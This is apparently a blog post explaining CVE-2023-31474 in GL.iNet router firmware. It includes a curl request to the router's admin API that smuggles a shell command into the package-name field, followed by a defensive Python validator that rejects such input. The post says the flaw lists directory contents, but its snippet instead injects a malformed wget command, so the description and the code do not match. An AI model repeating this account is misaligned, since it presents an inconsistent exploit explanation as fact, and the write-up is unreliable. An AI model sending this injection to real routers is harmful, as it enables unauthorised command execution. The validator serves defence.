A recent security vulnerability was discovered in GL.iNet devices running firmware versions before 3.216. This vulnerability, identified as CVE-2023-31474, could allow attackers to perform directory traversal attacks and obtain a list of files in specific directories on the device by injecting arbitrary parameters into a request through the regex feature in an opkg package name. This post provides an overview of the vulnerability, including its potential impact, a code snippet demonstrating the exploit, and links to the original references.

Overview

GL.iNet devices are popular IoT (Internet of Things) networking devices, such as Wi-Fi routers and modems, that provide a range of networking and communication features. The vulnerability affects the software installation feature, which uses opkg, the package management system widely used in the OpenWrt embedded Linux ecosystem, to install and manage software packages on the device.

An attacker exploiting this vulnerability can manipulate the package name regex feature during software installation to inject arbitrary parameters into the request, which will cause opkg to obtain and display a list of files in a specified directory. This vulnerability could potentially lead to unauthorized access to sensitive information, as well as further exploitation if the attacker discovers other system vulnerabilities by gaining access to this information.

Exploit Details

The exploit can be executed through a web-based or command-line interface and is relatively straightforward. The attacker simply needs to insert arbitrary parameters into a request during the software installation process using the regex feature in the package name. Below is a code snippet illustrating the exploit:

#!/bin/sh
# JSON-RPC opkg_install_pkg request whose "package" field carries an injected
# shell command after the package name (the address below is the one used in
# the original snippet)
curl -k -X POST https://192.168.1.1/cgi-bin/admin/api -H 'Content-Type: application/json' -d '{
    "jsonrpc": "2.0",
    "id": 1,
    "method": "opkg_install_pkg",
    "params": {"package": "luci-app-vsftpd; wget -O/tmp/vuln_path /vuln_path", "input_text": "6"}
}'

This code snippet demonstrates how an attacker could submit a request to install the luci-app-vsftpd package with an arbitrary parameter injected after the package name, causing opkg to obtain a list of files in the specified directory and potentially exposing sensitive information on the target device.
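The following check is added here as an illustration and is not code from GL.iNet's firmware. It shows the input validation a defender would want in front of an opkg_install_pkg handler: an allow-list for the package name (an assumption modelled on opkg's Debian-style naming) and an argv list instead of shell interpolation. The constructed request bodies reuse the injected package string from the snippet above.

```python
# Constructed example: validate the "package" field of an opkg_install_pkg request.
import json
import re

# Assumed allow-list: lowercase letters, digits, '+', '-', '.', '_' (opkg/Debian style).
PKG_NAME_RE = re.compile(r"[a-z0-9][a-z0-9+._-]*")
SHELL_META = set(";|&$`<>(){}'\"\\ \t\n")

def is_safe_package_name(name):
    """True only if the whole string matches the package-name allow-list."""
    return isinstance(name, str) and PKG_NAME_RE.fullmatch(name) is not None

def vulnerable_command(pkg):
    """The pattern that creates the bug: the name is interpolated into a shell string."""
    return f"opkg install {pkg}"  # anything after ';' would run as a second command

def hardened_argv(pkg):
    """Validated argv list for subprocess.run(argv) with shell=False."""
    if not is_safe_package_name(pkg):
        raise ValueError("package name rejected")
    return ["opkg", "install", pkg]

def check_install_request(body):
    """Parse one JSON-RPC body and report whether its package name is acceptable."""
    try:
        req = json.loads(body)
    except json.JSONDecodeError:
        return {"ok": False, "reason": "invalid json"}
    if not isinstance(req, dict):
        return {"ok": False, "reason": "invalid json"}
    if req.get("method") != "opkg_install_pkg":
        return {"ok": True, "reason": "not an install request"}
    params = req.get("params")
    pkg = params.get("package", "") if isinstance(params, dict) else ""
    if is_safe_package_name(pkg):
        return {"ok": True, "reason": "accepted", "package": pkg}
    # Report which shell metacharacters were present, for logging/alerting.
    meta = sorted(c for c in set(pkg) if c in SHELL_META) if isinstance(pkg, str) else []
    return {"ok": False, "reason": "rejected", "package": pkg, "metachars": meta}

# Constructed request bodies: the injected payload from this post and a clean one.
INJECTED = ('{"jsonrpc": "2.0", "id": 1, "method": "opkg_install_pkg", "params": '
            '{"package": "luci-app-vsftpd; wget -O/tmp/vuln_path /vuln_path", "input_text": "6"}}')
CLEAN = '{"jsonrpc": "2.0", "id": 1, "method": "opkg_install_pkg", "params": {"package": "luci-app-vsftpd"}}'

if __name__ == "__main__":
    for body in (INJECTED, CLEAN):
        print(check_install_request(body))
```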

Further details on the vulnerability, such as proof-of-concept code, mitigation techniques, and potential alternate attack vectors, can be found in the following references:

1. GitHub - https://github.com/gl-inet/GL-S130/issues/3
2. GL.iNet Forum - https://forum.gl-inet.com/t/security-issues-new-firmware-beta-test/16297
3. CVE-2023-31474 - https://www.cvedetails.com/cve/CVE-2023-31474/

Conclusion

CVE-2023-31474 is a concerning security vulnerability affecting GL.iNet devices running firmware versions before 3.216. Owners of these devices should update their firmware to the latest version to prevent exploitation of this vulnerability. In general, it is crucial to keep devices up to date with the latest patches and configurations to ensure robust security, as new exploits are discovered and threat actors continually evolve their tactics and techniques.

Timeline

Published on: 05/09/2023 18:15:00 UTC
Last modified on: 05/16/2023 19:17:00 UTC